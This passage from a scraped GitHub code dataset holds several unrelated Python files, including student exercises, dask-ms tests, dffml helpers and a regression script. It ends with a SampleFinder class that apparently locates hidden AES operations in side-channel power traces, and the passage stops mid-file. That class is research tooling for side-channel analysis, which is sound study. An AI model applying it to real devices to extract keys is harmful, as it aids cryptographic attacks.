element value (x) stored at the tuple's second position\r\n\r\n    else: \r\n        heapq.heappush(abs_heap, (abs(x), x)) # the heap orders by the first element of the tuple \r\n    ","repo_name":"data-sign/algorithm","sub_path":"백준/Silver/11286. 절댓값 힙/절댓값 힙.py","file_name":"절댓값 힙.py","file_ext":"py","file_size_in_byte":561,"program_lang":"python","lang":"ko","doc_type":"code","stars":2,"dataset":"github-code","pt":"72"} +{"seq_id":"74482315111","text":"# -*- coding: utf-8 -*-\n\nimport os\nfrom os.path import join as pjoin\nimport pytest\n\nfrom daskms.table_schemas import (\n    lookup_table_schema,\n    MS_SCHEMA,\n    ANTENNA_SCHEMA,\n    FEED_SCHEMA,\n    FIELD_SCHEMA,\n    SPECTRAL_WINDOW_SCHEMA,\n    OBSERVATION_SCHEMA,\n    POLARIZATION_SCHEMA,\n    POINTING_SCHEMA,\n)\n\n\n@pytest.mark.parametrize(\n    \"filename, schema\",\n    [\n        (pjoin(\"bob\", \"qux\", f\"FRED.MS{os.sep}\"), MS_SCHEMA),\n        (\"test.ms\", MS_SCHEMA),\n        (\"test.ms::ANTENNA\", ANTENNA_SCHEMA),\n        (\"test.ms::FEED\", FEED_SCHEMA),\n        (\"test.ms::FIELD\", FIELD_SCHEMA),\n        (\"test.ms::OBSERVATION\", OBSERVATION_SCHEMA),\n        (\"test.ms::POINTING\", POINTING_SCHEMA),\n        (\"test.ms::POLARIZATION\", POLARIZATION_SCHEMA),\n        (\"test.ms::SPECTRAL_WINDOW\", SPECTRAL_WINDOW_SCHEMA),\n    ],\n)\ndef test_table_suffix_lookup(filename, schema):\n    assert schema == lookup_table_schema(filename, None)\n\n\n@pytest.mark.parametrize(\"schema_name, schema\", [(\"MS\", MS_SCHEMA)])\ndef test_table_schema_name_lookup(schema_name, schema):\n    assert schema == lookup_table_schema(\"test.ms\", schema_name)\n","repo_name":"ratt-ru/dask-ms","sub_path":"daskms/tests/test_table_schemas.py","file_name":"test_table_schemas.py","file_ext":"py","file_size_in_byte":1120,"program_lang":"python","lang":"en","doc_type":"code","stars":17,"dataset":"github-code","pt":"72"} +{"seq_id":"31099742798","text":"# Min, max\n# Implementation \n\nN = int(input())\narr = list(map(int,input().split()))\nmax = arr[0]\nmin = arr[0]\nfor i in range(N) :\n    if arr[i] > max :\n        max = arr[i]\n    elif arr[i] < min :\n        min = arr[i]\n\nprint(min,max)","repo_name":"halionaz/Algorithm","sub_path":"baekjoon/10818.py","file_name":"10818.py","file_ext":"py","file_size_in_byte":231,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"72"} +{"seq_id":"47402982850","text":"\"\"\"\nConversions for Planck units to metric units.\n\"\"\"\n\n\n# Convert meters to planck lengths\ndef meters_to_lp(meters: float, rounding: int) -> float: \n\n    conversion = 1.61605 * 10**-35\n    if meters == 0:\n        raise Exception('Cannot calculate zero value!\\n')\n    planck_lengths = meters / conversion\n\n    return round(planck_lengths, rounding)\n\n\n# Convert planck lengths to meters\ndef lp_to_meters(lp: float, rounding: int) -> float:\n\n    conversion = 1.61605 * 10**-35\n    meters = lp * conversion\n    if lp == 0:\n        raise Exception('Cannot calculate zero value!\\n')\n\n    return round(meters, rounding)\n","repo_name":"D-Bits/Converty","sub_path":"converty/planck.py","file_name":"planck.py","file_ext":"py","file_size_in_byte":613,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"72"} +{"seq_id":"10614669283","text":"'''\nSimulated login\n    If the password is wrong 3 times in a row, report that the account is locked, e.g.:\n    Enter username: qtx\n    Enter password: 1234\n    Login failed\n    You have 2 attempts left\n    Enter username: Qtx\n    Enter password: 1234\n    Login failed\n    You have 1 attempt left\n    Enter username: Qtx\n    Enter password: 123456\n    Login successful\n'''\nfor i in range(2, -1, -1):\n    user = input(\"Enter username: \")\n    pwd = input(\"Enter password: \")\n    if user == \"xiashuobad\" and pwd == \"135456..\":\n        print(\"Login successful\")\n        break\n    if i == 0:\n        print(\"3 failed attempts in a row; the account is locked.\")\n        break\n    
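# neither branch above matched: report the failure and the remaining attempts\n    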
print(f\"Login failed, you have {i} attempts left.\")\n","repo_name":"xiashuo/tedu_execises","sub_path":"month01/day4/exercise3.py","file_name":"exercise3.py","file_ext":"py","file_size_in_byte":747,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"3903041356","text":"from typing import AsyncIterator\n\nfrom ..util.internal import records_to_sources\nfrom ..source.source import BaseSource, Record\n\n\nasync def save(source: BaseSource, *args: Record) -> None:\n    \"\"\"\n    Update a source's knowledge about given records.\n\n    For each record given, call\n    :py:func:`update ` on the\n    source. Effectively saving all the records to the source.\n\n    Parameters\n    ----------\n    source : BaseSource\n        Data source to use. See :doc:`/plugins/dffml_source` for sources and\n        options.\n    *args : list\n        Records to be saved.\n\n    Examples\n    --------\n\n    >>> import asyncio\n    >>> import pathlib\n    >>> from dffml import *\n    >>>\n    >>> source = CSVSource(filename=\"save.csv\", allowempty=True, readwrite=True)\n    >>>\n    >>> async def main():\n    ...     await save(\n    ...         source,\n    ...         Record(\n    ...             \"myrecord\",\n    ...             data={\n    ...                 \"features\": {\"Years\": 0, \"Expertise\": 1, \"Trust\": 0.1},\n    ...                 \"prediction\": {\"Salary\": {\"value\": 10, \"confidence\": 1.0}},\n    ...             }\n    ...         )\n    ...     )\n    ...     print(pathlib.Path(\"save.csv\").read_text().strip())\n    >>>\n    >>> asyncio.run(main())\n    key,tag,Expertise,Trust,Years,prediction_Salary,confidence_Salary\n    myrecord,untagged,1,0.1,0,10,1.0\n    \"\"\"\n    async with records_to_sources(source) as sctx:\n        for record in args:\n            await sctx.update(record)\n\n\nasync def load(source: BaseSource, *args: str) -> AsyncIterator[Record]:\n    \"\"\"\n    Yields records from a source.\n\n    Yields all the records from the source, if record keys are given then only\n    those records are yielded.\n\n    Parameters\n    ----------\n    source : BaseSource\n        Data source to use. See :doc:`/plugins/dffml_source` for sources and\n        options.\n    *args : str\n        Records to be returned. If empty, all the records in a source will be returned.\n\n    Returns\n    -------\n    asynciterator\n        :py:class:`Record ` object\n\n    Examples\n    --------\n\n    >>> import asyncio\n    >>> from dffml import *\n    >>>\n    >>> source = CSVSource(filename=\"load.csv\", allowempty=True, readwrite=True)\n    >>>\n    >>> async def main():\n    ...     await save(\n    ...         source,\n    ...         Record(\"1\", data={\"features\": {\"A\": 0, \"B\": 1}}),\n    ...         Record(\"2\", data={\"features\": {\"A\": 3, \"B\": 4}}),\n    ...     )\n    ...\n    ...     # All records in source\n    ...     async for record in load(source):\n    ...         print(record.export())\n    ...\n    ...     # For specific records in a source\n    ...     async for record in load(source, \"1\"):\n    ...         print(record.export())\n    ...\n    ...     # Lightweight source syntax\n    ...     async for record in load(\"load.csv\", \"2\"):\n    ...         
print(record.export())\n    >>>\n    >>> asyncio.run(main())\n    {'key': '1', 'features': {'A': 0, 'B': 1}, 'extra': {}}\n    {'key': '2', 'features': {'A': 3, 'B': 4}, 'extra': {}}\n    {'key': '1', 'features': {'A': 0, 'B': 1}, 'extra': {}}\n    {'key': '2', 'features': {'A': 3, 'B': 4}, 'extra': {}}\n    \"\"\"\n    async with records_to_sources(source) as sctx:\n        if args:\n            # If specific records are to be loaded\n            for record in args:\n                yield await sctx.record(record)\n        else:\n            # All the records are loaded\n            async for record in sctx.records():\n                yield record\n","repo_name":"intel/dffml","sub_path":"dffml/high_level/source.py","file_name":"source.py","file_ext":"py","file_size_in_byte":3529,"program_lang":"python","lang":"en","doc_type":"code","stars":232,"dataset":"github-code","pt":"72"} +{"seq_id":"40756468979","text":"from db_connection import DatabaseConnection\n\nconnection = DatabaseConnection()\nconn = connection.dbconnection()\ndb = conn.cursor(buffered=True, dictionary=True)\n\n\ndef book_order(user_id, address):\n    \"\"\"\n    desc: query to call the procedure where many queries are performed\n    param: user_id, order model.\n    \"\"\"\n    args = [user_id, f'{address}']\n    show_data_query = db.callproc('place_order', args)\n    conn.commit()\n    return show_data_query\n\n\ndef get_data(user_id):\n    \"\"\"\n    desc: query to call order details\n    param: user_id.\n    \"\"\"\n    query = '''select id from order_details where user_id = %d ''' % user_id\n    db.execute(query)\n    conn.commit()\n    result = db.fetchall()\n    return result\n","repo_name":"mule1998/BookStoreApp","sub_path":"service/order.py","file_name":"order.py","file_ext":"py","file_size_in_byte":739,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"5813600406","text":"import random\r\nimport pygame\r\n\r\nANCHO = 800\r\nLARGO = 600\r\n\r\nNEGRO =(0,0,0)\r\nBLANCO =(255,255,255)\r\nROJO =(255,0,0)\r\nH_FA2F22F =(250,47,47)\r\nVERDE =(0,255,0)\r\nAZUL =(0,0,255)\r\n\r\nclass enemy(pygame.sprite.Sprite):\r\n    def __init__(self):\r\n        # inherit from the pygame sprite class\r\n        super().__init__()\r\n        \r\n        # load the enemy image\r\n        self.image = pygame.image.load(\"C:/Users/Angel/Desktop/PAGINAS WEB/turtle/videojuego/1.-videojuego/enemigo.png\")\r\n        # get the sprite's rectangle\r\n        self.rect = self.image.get_rect()\r\n        # position on the map\r\n        self.rect.center = (200,500)\r\n        \r\n        # random position\r\n        self.rect.x = random.randrange(ANCHO - self.rect.width)\r\n        self.rect.y = random.randrange(300 - self.rect.height)\r\n        \r\n        # character movement speed\r\n        self.velocidad_x = random.randrange(1,10)\r\n        self.velocidad_y = random.randrange(1,10)\r\n        \r\n        \r\n    def update(self):\r\n        self.rect.x += self.velocidad_x\r\n        self.rect.y += self.velocidad_y\r\n        \r\n        # left boundary\r\n        \r\n        if self.rect.left < 0 :\r\n            self.velocidad_x += 1\r\n        # right boundary \r\n        if self.rect.right > ANCHO :\r\n            self.velocidad_x -= 1\r\n        # bottom boundary\r\n        if self.rect.bottom > LARGO:\r\n            self.velocidad_y -=1\r\n        # top boundary\r\n        if self.rect.top < 0:\r\n            self.velocidad_y += 1\r\n        \r\n","repo_name":"Angelnever/libreria-turtle","sub_path":"videojuego/1.-videojuego/enemy.py","file_name":"enemy.py","file_ext":"py","file_size_in_byte":1466,"program_lang":"python","lang":"es","doc_type":"code","stars":0,"dataset":"github-code","pt":"72"} +{"seq_id":"29592829003","text":"# Chang Wei Tan, Christoph Bergmeir, Francois Petitjean, Geoff Webb\n#\n# @article{\n# Tan2020TSER,\n# title={Time Series Extrinsic Regression},\n# author={Tan, Chang Wei 
and Petitjean, Francois and Webb, Geoffrey I},\n# journal={Data Mining and Knowledge Discovery},\n# pages={1--29},\n# year={2021},\n# publisher={Springer},\n# doi={https://doi.org/10.1007/s10618-021-00745-9}\n# }\n\nimport numpy as np\n\nfrom utils.data_loader import load_from_tsfile_to_dataframe\nfrom utils.regressor_tools import process_data, fit_regressor, calculate_regression_metrics\nfrom utils.tools import create_directory\n\nmodule = \"RegressionExperiment\"\ndata_path = \"data/\"\nproblems = [\"Sample\"] # see data_loader.regression_datasets\nregressors = [\"xgboost\"] # see regressor_tools.all_models\niterations = [1]\nnorm = \"none\" # none, standard, minmax\n\noutput_path = \"output/regression/\"\nif __name__ == '__main__':\n # for each problem\n for problem in problems:\n print(\"#########################################################################\")\n print(\"[{}] Starting Experiments\".format(module))\n print(\"#########################################################################\")\n print(\"[{}] Data path: {}\".format(module, data_path))\n print(\"[{}] Problem: {}\".format(module, problem))\n\n # set data folder, train & test\n data_folder = data_path + problem + \"/\"\n train_file = data_folder + problem + \"_TRAIN.ts\"\n test_file = data_folder + problem + \"_TEST.ts\"\n\n # loading the data. X_train and X_test are dataframe of N x n_dim\n print(\"[{}] Loading data\".format(module))\n X_train, y_train = load_from_tsfile_to_dataframe(train_file)\n X_test, y_test = load_from_tsfile_to_dataframe(test_file)\n\n print(\"[{}] X_train: {}\".format(module, X_train.shape))\n print(\"[{}] X_test: {}\".format(module, X_test.shape))\n\n # in case there are different lengths in the dataset, we need to consider that.\n # assume that all the dimensions are the same length\n print(\"[{}] Finding minimum length\".format(module))\n min_len = np.inf\n for i in range(len(X_train)):\n x = X_train.iloc[i, :]\n all_len = [len(y) for y in x]\n min_len = min(min(all_len), min_len)\n for i in range(len(X_test)):\n x = X_test.iloc[i, :]\n all_len = [len(y) for y in x]\n min_len = min(min(all_len), min_len)\n print(\"[{}] Minimum length: {}\".format(module, min_len))\n\n # process the data into numpy array\n print(\"[{}] Reshaping data\".format(module))\n x_train = process_data(X_train, normalise=norm, min_len=min_len)\n x_test = process_data(X_test, normalise=norm, min_len=min_len)\n\n print(\"[{}] X_train: {}\".format(module, x_train.shape))\n print(\"[{}] X_test: {}\".format(module, x_test.shape))\n\n for regressor_name in regressors:\n print(\"[{}] Regressor: {}\".format(module, regressor_name))\n for itr in iterations:\n # create output directory\n output_directory = \"output/regression/\"\n if norm != \"none\":\n output_directory = \"output/regression_{}/\".format(norm)\n output_directory = output_directory + regressor_name + '/' + problem + '/itr_' + str(itr) + '/'\n create_directory(output_directory)\n\n print(\"[{}] Iteration: {}\".format(module, itr))\n print(\"[{}] Output Dir: {}\".format(module, output_directory))\n\n # fit the regressor\n regressor = fit_regressor(output_directory, regressor_name, x_train, y_train, x_test, y_test, itr=itr)\n\n # start testing\n y_pred = regressor.predict(x_test)\n df_metrics = calculate_regression_metrics(y_test, y_pred)\n\n print(df_metrics)\n\n # save the outputs\n df_metrics.to_csv(output_directory + 'regression_experiment.csv', 
index=False)\n","repo_name":"ChangWeiTan/TS-Extrinsic-Regression","sub_path":"run_experiments.py","file_name":"run_experiments.py","file_ext":"py","file_size_in_byte":4078,"program_lang":"python","lang":"en","doc_type":"code","stars":66,"dataset":"github-code","pt":"72"} +{"seq_id":"31797502079","text":"#!/usr/bin/python3\n\n# sure imports\nimport numpy as np\nimport holoviews as hv\nfrom bokeh.plotting import figure, show\nfrom bokeh.io import output_notebook, reset_output\n\nfrom src.helper import _print, detrending_filter\nfrom src.autocorrelation_accl import Autocorrelation_Accelerator\n\n\nclass SampleFinder:\n def __init__(self, trace_container, top_x=10, do_plots=False, print_info=True, error_margin=0.02, exact_clk_cycles=None, allowed_sub_peak_delta=2):\n if(print_info):\n print(\"initialized the sample finder with \" + str(trace_container.nr_hidden_cos) +\n \" hidden aes cycles, sample rate of \" + str(trace_container.get_fs()))\n\n self.trace_container = trace_container\n\n if exact_clk_cycles == None:\n self.min_clk_cycles = max(\n 1, int(trace_container.known_width_clk_cycles*0.95))\n self.max_clk_cycles = max(\n self.min_clk_cycles+1, int(trace_container.known_width_clk_cycles*1.05))\n else:\n self.min_clk_cycles = exact_clk_cycles\n self.max_clk_cycles = exact_clk_cycles+1\n\n # is config of sample finder:\n self.store_for_latex = False\n self.top_x = top_x\n self.error_margin = error_margin\n self.print_info = print_info\n self.do_plots = do_plots\n self.dict_plots = None\n self.df_corr_for_each_width = None\n self.allowed_sub_peak_delta = allowed_sub_peak_delta\n\n self.correlation_dict = {}\n self.filtered_correlation_dict = {}\n self.mean_event_dicts = {}\n\n #\n def full_auto_find_COs(self, do_quality_plot=False, do_main_sub_peak_plot=False, sad_for_autocorr=False, sad_approach=True, avg_round_template=True, use_detrended=False):\n \"\"\"\n full_auto_find_COs Finds all COs in the trace in self.trace_container.\n\n :param do_quality_plot: If this is set, the similarity of step 1 will be plotted (takes a lot of time)\n :param do_main_sub_peak_plot: If this is set, the similarity of step 3 will be plotted. This is where the main-peaks and sub-peaks are.\n :param sad_for_autocorr: Calculates the round-similarity with SAD instead of the Pearson correlation\n :param sad_approach: Calculates the similarity of the found template candidate (through step 1) with SAD instead of the Pearson correlation\n :param avg_round_template: Instead of using the entire CO as a template, average all rounds, then concatenate them together\n :param use_detrended: Use a rolling average filter to detrend the similarity of the similarity in step 1\n :return: returns a triple with the best_fitting_width found, a list of starting indices that we found and the CO-Template candidate that we chose.\n \"\"\"\n f_device = self.trace_container.known_device_frequency\n self.trace_container.calculated_device_frequency = f_device\n samples_per_clock = self.trace_container.get_fs() / f_device\n print(\"samples per clock: \" + str(samples_per_clock))\n possible_widths = np.arange(samples_per_clock*self.min_clk_cycles,\n samples_per_clock*self.max_clk_cycles, step=samples_per_clock, dtype=int)\n print(\"possible widths (samples): \" + str(possible_widths))\n print(\"possible widths (cycles): \" +\n str(np.arange(self.min_clk_cycles, self.max_clk_cycles)))\n self.f_device = f_device\n\n # 2. 
Test all possible widths, find starting index that has best autocorrelation\n        from time import process_time\n        t1_start = process_time()\n        opencl_autocorr = Autocorrelation_Accelerator(self.trace_container.get_trace(\n        ), self.trace_container.no_similar_rounds, self.top_x, do_plots=do_quality_plot, use_detrended=use_detrended, trace_container=self.trace_container)\n        if sad_for_autocorr:\n            best_widths, widths_correlation, correlation_for_each_width = opencl_autocorr.autosad_accelerated_updated(\n                possible_widths)\n        else:\n            best_widths, widths_correlation, correlation_for_each_width = opencl_autocorr.autocorrelation_accelerated_updated(\n                possible_widths)\n        t1_stop = process_time()\n        self.alg1_time_sec = t1_stop-t1_start\n        if self.print_info:\n            print(\"GPU: Finding best possible starting points used \" +\n                  str((t1_stop-t1_start)) + \" seconds\")\n            print(best_widths)\n        best_width = possible_widths[int(best_widths[0, 1])]\n        starting_position = widths_correlation[int(\n            best_widths[0, 1]), 0, 1]\n        # print(best_widths)\n        print(\"best_width = \" + str(best_width) + \" with correlation of: \" +\n              str(best_widths[0, 0]) + \" at starting position: \" + str(starting_position))\n\n        # 3. calculate best fitting width, utilizing the number of sub-peaks behind each main-peak.\n        find_best_fitting_width_start = process_time()\n        best_fitting_width, peak_idx_list, char_trace_template = self.get_best_fitting_width(\n            best_widths, possible_widths, widths_correlation, f_device, sad_approach=sad_approach, avg_round_template=avg_round_template, allowed_sub_peak_delta=self.allowed_sub_peak_delta, do_plots=do_main_sub_peak_plot)\n        find_best_fitting_width_end = process_time()\n        self.alg2_time_sec = find_best_fitting_width_end-find_best_fitting_width_start\n        if self.print_info:\n            print(\"best fitting width is : \" + str(best_fitting_width))\n            print(\"found on cpu using \" + str((find_best_fitting_width_end -\n                                               find_best_fitting_width_start)) + \" seconds\")\n        self.trace_container.calculated_start_idx_aes = peak_idx_list\n        self.trace_container.calculated_width = best_fitting_width\n        return (best_fitting_width, peak_idx_list, char_trace_template)\n\n    def number_of_equidistant_peaks(self, x, distance, main_peak_idx=0, max_peaks=9, delta=1):\n        number_of_peaks = 0\n        max_idx = len(x)-1\n        for sub_peak_idx in np.arange(distance, main_peak_idx+distance*max_peaks, step=distance):\n            if(sub_peak_idx+2 * delta-1 > max_idx):\n                return number_of_peaks\n            #idx_is_peak = (x[sub_peak_idx]>x[sub_peak_idx+delta] and x[sub_peak_idx]>x[sub_peak_idx-delta] and (x[sub_peak_idx]<=x[main_peak_idx]))\n            idx_is_peak = self.is_a_peak(x, sub_peak_idx, main_peak_idx, delta)\n            if delta > 1:\n                for idx in np.arange(sub_peak_idx-delta, sub_peak_idx+delta, step=1, dtype=int):\n                    if self.is_a_peak(x, idx, main_peak_idx, delta):\n                        idx_is_peak = self.is_a_peak(\n                            x, idx, main_peak_idx, delta)\n            if idx_is_peak:\n                number_of_peaks += 1\n            else:\n                return number_of_peaks\n        return number_of_peaks\n\n    def is_a_peak(self, x, idx, main_peak_idx, delta=1):\n        return (x[idx] > x[idx+delta] and x[idx] > x[idx-delta] and (x[idx] <= x[main_peak_idx]))\n\n    def find_peaks(self, correlation, w_segment, w_event, correlation_step_size, min_number_of_sub_peaks=8, no_rounds=64, max_num_peaks=5000, allowed_sub_peak_delta=2):\n        if self.print_info:\n            print(\"Finding main- and sub-peaks for width : \" +\n                  str(w_segment*correlation_step_size))\n        correlation_orig = np.copy(correlation)\n        correlation_removed_peaks = np.copy(correlation)\n        peak_idx = []\n        nr_of_peaks = 0\n\n        for i in 
range(max_num_peaks):\n            # find next main-peak at max_idx\n            max_idx = np.argmax(correlation_removed_peaks)\n            if(max_idx > len(correlation_orig)-w_event):  # pad with zeros if we need them\n                correlation = np.concatenate(\n                    (correlation, np.zeros(w_event+1)))\n                correlation_removed_peaks = np.concatenate(\n                    (correlation_removed_peaks, np.zeros(w_event+1)))\n                correlation_orig = np.concatenate(\n                    (correlation_orig, np.zeros(w_event+1)))\n            nr_of_peaks = self.number_of_equidistant_peaks(\n                correlation_orig[max_idx:max_idx+w_event+2*allowed_sub_peak_delta], distance=w_segment, delta=allowed_sub_peak_delta, max_peaks=no_rounds)\n            _print(\"nr_of_equidistant_peaks = \" +\n                   str(nr_of_peaks), print_info=\"debug\")\n\n            if True:  # also check for sub-peaks before the main peak\n                nr_of_peaks_before = self.number_of_equidistant_peaks(np.flip(correlation_orig[np.max(\n                    (max_idx-w_event-2*allowed_sub_peak_delta, 0)):max_idx+1]), distance=w_segment, delta=allowed_sub_peak_delta, max_peaks=no_rounds)\n                _print(\"nr_of_equidistant_peaks_before = \" +\n                       str(nr_of_peaks_before), print_info=\"debug\")\n                nr_of_peaks = (nr_of_peaks + nr_of_peaks_before)/2\n\n            if nr_of_peaks < min_number_of_sub_peaks:\n                # not enough sub peaks, probably no more AES in here! (at least no well detectable AES cycles!)\n                if self.print_info:\n                    print(\"We found \" + str(i) + \" peaks. Not enough sub-peaks for next main-peak at position: \" +\n                          str(max_idx*correlation_step_size))\n                break\n\n            peak_idx.append(max_idx*correlation_step_size)\n            for i in range(max(0, max_idx-int(w_event*0.7)), min(len(correlation_removed_peaks), max_idx + int(w_event*0.7))):\n                correlation_removed_peaks[i] = 0\n        return peak_idx, nr_of_peaks\n\n    # Evaluate a certain best width:\n    def get_peaks_for_width(self, f_device, width, starting_position, min_number_of_sub_peaks=8, do_plots=False, print_info=False, max_num_peaks=5000, new_chosen_mean_event=None, sad_approach=False, avg_round_template=True, allowed_sub_peak_delta=1):\n        samples_per_clock = self.trace_container.get_fs()/f_device\n        w = int(width)\n        i = int(starting_position)\n        # IDEA: starting position could be \"in the middle of a clock cycle\" => calculate offset! 
from 0\n        start_offset = i % samples_per_clock\n        correlation_step_size = min(w/4, samples_per_clock)\n        if w not in self.correlation_dict:\n            # we create a new characteristic trace from scratch at starting point i and correlate/sad it with everything!\n            idx_list = np.arange(start_offset, len(self.trace_container.get_trace(\n            ))-(self.trace_container.no_similar_rounds*w), step=correlation_step_size, dtype=int)\n            # check bounds:\n            if (i+w*self.trace_container.no_similar_rounds) > len(self.trace_container.get_trace()):\n                return (-1, -1, -1)\n            if avg_round_template:\n                chosen_mean_segment = np.average([self.trace_container.get_trace(\n                )[i+w*j:i+w*(j+1)] for j in range(self.trace_container.no_similar_rounds)], axis=0)\n                chosen_mean_event = np.array([chosen_mean_segment for j in range(\n                    self.trace_container.no_similar_rounds)]).flatten()\n            else:\n                chosen_mean_event = self.trace_container.get_trace(\n                )[i:i+w*self.trace_container.rounds_in_co_template]\n\n            if not sad_approach:\n                corrl_accl = Autocorrelation_Accelerator()\n                all_correlation = corrl_accl.correlate(\n                    self.trace_container.get_trace(), chosen_mean_event, idx_list, opencl=True)\n\n                filtered_correlation = detrending_filter(\n                    all_correlation, (w)/correlation_step_size)\n                self.mean_event_dicts[w] = chosen_mean_event\n                self.correlation_dict[w] = all_correlation\n                self.filtered_correlation_dict[w] = filtered_correlation\n            else:\n                corrl_accl = Autocorrelation_Accelerator()\n                self.mean_event_dicts[w] = chosen_mean_event\n                sad_over_everything = np.array(corrl_accl.calc_sad(\n                    self.mean_event_dicts[w], self.trace_container.get_trace(), idx_list=idx_list))\n                all_correlation = -1*sad_over_everything\n                filtered_correlation = detrending_filter(\n                    all_correlation, (w)/correlation_step_size)\n                self.correlation_dict[w] = all_correlation\n                self.filtered_correlation_dict[w] = filtered_correlation\n            if do_plots:\n                reset_output()\n                output_notebook()\n                p = figure(width=900, height=600)\n                x_range = range(0, len(self.trace_container.get_trace()))\n                corr_plot_y = all_correlation * \\\n                    np.max(self.trace_container.get_trace())\n                p.line(np.arange(0, len(self.trace_container.get_trace()), step=correlation_step_size)[\n                    :len(corr_plot_y)], corr_plot_y, color='black')\n                filtered_corr_plot_y = filtered_correlation * \\\n                    np.max(self.trace_container.get_trace()) - \\\n                    np.max(self.trace_container.get_trace())\n                p.line(np.arange(0, len(self.trace_container.get_trace()), step=correlation_step_size)[\n                    :len(filtered_corr_plot_y)], filtered_corr_plot_y, color='orange')\n                show(p)\n        else:\n            filtered_correlation = self.filtered_correlation_dict[w]\n            all_correlation = self.correlation_dict[w]\n            chosen_mean_event = self.mean_event_dicts[w]\n\n        peak_idx_list, least_peaks = self.find_peaks(filtered_correlation, int(w/correlation_step_size), int((self.trace_container.no_similar_rounds*w)/correlation_step_size),\n                                                     correlation_step_size, min_number_of_sub_peaks, max_num_peaks=max_num_peaks, allowed_sub_peak_delta=allowed_sub_peak_delta, no_rounds=self.trace_container.no_similar_rounds)\n        peak_idx_list = (np.array(peak_idx_list))\n\n        # remove overlapping peaks if they don't fit\n        if(len(peak_idx_list) > self.trace_container.nr_hidden_cos):\n            # check whether the peaks that were added last fit in with the peaks collected so far; if they are clearly lower, they do not belong here and are removed\n            min_peak = int(\n                peak_idx_list[self.trace_container.nr_hidden_cos-1]/correlation_step_size)\n            max_peak = int(peak_idx_list[0]/correlation_step_size)\n            min_threshold = filtered_correlation[min_peak] - (\n                filtered_correlation[max_peak] - filtered_correlation[min_peak])*2/self.trace_container.nr_hidden_cos\n            for overlap_peak_idx in range(self.trace_container.nr_hidden_cos, len(peak_idx_list)):\n                overlap_peak = peak_idx_list[overlap_peak_idx] / \\\n                    correlation_step_size\n                #if self.print_info: print(\"hidden cycles = \"+ str(self.trace_container.nr_hidden_cos) +\"removed, peaklistlennow:\" + str(len(peak_idx_list)))\n                if filtered_correlation[int(overlap_peak)] < min_threshold:\n                    # remove this point and the following ones because they do not belong here\n                    peak_idx_list = peak_idx_list[:overlap_peak_idx]\n                    if self.print_info:\n                        print(\"REMOVED last peaks because they are too low: hidden cycles = \" + str(\n                            self.trace_container.nr_hidden_cos) + \" peaklistlennow:\" + str(len(peak_idx_list)))\n                    break\n        return (peak_idx_list, least_peaks, chosen_mean_event)\n\n    # Evaluate a certain best width:\n    def get_best_fitting_width(self, best_widths, w_list, widths_correlation, f_device, sad_approach=False, avg_round_template=True, allowed_sub_peak_delta=1, do_plots=False):\n        best_fitting_width = 0\n        least_peaks_array = np.zeros(\n            len(best_widths[:, 1]))+self.trace_container.no_similar_rounds\n        peak_idx_list = []\n        return_peak_idx_list = []\n\n        chosen_mean_events = [np.zeros(int(best_widths[i, 1]))\n                              for i in range(len(best_widths[:, 1]))]\n        for min_number_of_sub_peaks in np.arange(self.trace_container.no_similar_rounds-1, 1, step=-1, dtype=int):\n            if self.print_info:\n                print(\"Try with min number of \" +\n                      str(min_number_of_sub_peaks) + \" sub peaks for each CO!\")\n                print(\"--------------------------------------------------------------------\")\n            least_peaks_array_idx = 0\n            for width_idx, idx in zip(best_widths[:, 1], range(len(best_widths[:, 1]))):\n                # skip the ones that won't get new peaks this round:\n                if least_peaks_array[least_peaks_array_idx] < min_number_of_sub_peaks:\n                    least_peaks_array_idx += 1\n                    continue\n                width = w_list[int(width_idx)]\n                starting_position = widths_correlation[int(width_idx), 0, 1]\n                # Find number of main-peaks for this width with at least min_number_of_subpeaks:\n                peak_idx_list, least_peaks_array[least_peaks_array_idx], chosen_mean_events[idx] = self.get_peaks_for_width(f_device, width, starting_position, min_number_of_sub_peaks=min_number_of_sub_peaks, do_plots=do_plots, max_num_peaks=(\n                    self.trace_container.nr_hidden_cos*2 + self.trace_container.nr_hidden_cos*allowed_sub_peak_delta), sad_approach=sad_approach, avg_round_template=avg_round_template, allowed_sub_peak_delta=allowed_sub_peak_delta)\n                if least_peaks_array[least_peaks_array_idx] == -1:\n                    continue\n                if(len(peak_idx_list) >= int(self.trace_container.nr_hidden_cos) and len(peak_idx_list) <= self.trace_container.nr_hidden_cos + int(self.trace_container.nr_hidden_cos*self.error_margin)):  # Margin for error :)\n                    peak_idx_list = peak_idx_list[:self.trace_container.nr_hidden_cos]\n                    print(\"right number of COs for width of \" + str(width))\n                    if self.print_info:\n                        print(\"peaks: \")\n                    if self.print_info:\n                        print(peak_idx_list)\n                    best_fitting_width = width\n                    return_peak_idx_list = peak_idx_list\n                    first_index = int(starting_position)\n                    char_round_template = 
np.average([self.trace_container.get_trace(\n )[first_index+width*j:first_index+width*(j+1)] for j in range(self.trace_container.no_similar_rounds)], axis=0)\n char_trace_template = np.array([char_round_template for j in range(\n self.trace_container.no_similar_rounds)]).flatten()\n self.min_number_of_sub_peaks_needed = min_number_of_sub_peaks\n break\n if len(peak_idx_list) > self.trace_container.nr_hidden_cos + int(self.trace_container.nr_hidden_cos*self.error_margin):\n continue\n least_peaks_array_idx += 1\n if(best_fitting_width != 0):\n return best_fitting_width, return_peak_idx_list, char_trace_template\n return -1, -1, -1 # no fitting width found!\n\n def find_COs_with_template(self, template, do_plots=False, print_info=True, use_sad=True, no_decimation=True):\n corrl_accl = Autocorrelation_Accelerator()\n samples_per_clock = self.trace_container.get_fs(\n )/self.trace_container.calculated_device_frequency\n w = int(self.trace_container.calculated_width)\n if self.trace_container.calculated_start_idx_aes[0] != None:\n i = int(self.trace_container.calculated_start_idx_aes[0])\n # IDEA: starting position could be \"in the middle of a clock cycle\" => calculate offset! from 0\n start_offset = i % samples_per_clock\n correlation_step_size = min(w/2, samples_per_clock)\n else:\n start_offset = 0\n correlation_step_size = min(w/2, samples_per_clock)\n if no_decimation:\n correlation_step_size = 1\n idx_list = np.arange(start_offset, len(self.trace_container.get_trace(\n ))-len(template), step=correlation_step_size, dtype=int)\n if use_sad:\n correlation = np.array(corrl_accl.calc_sad(\n template, self.trace_container.get_trace(), idx_list))*-1\n else:\n correlation = corrl_accl.correlate(\n self.trace_container.get_trace(), template, idx_list, opencl=True)\n filtered_correlation = 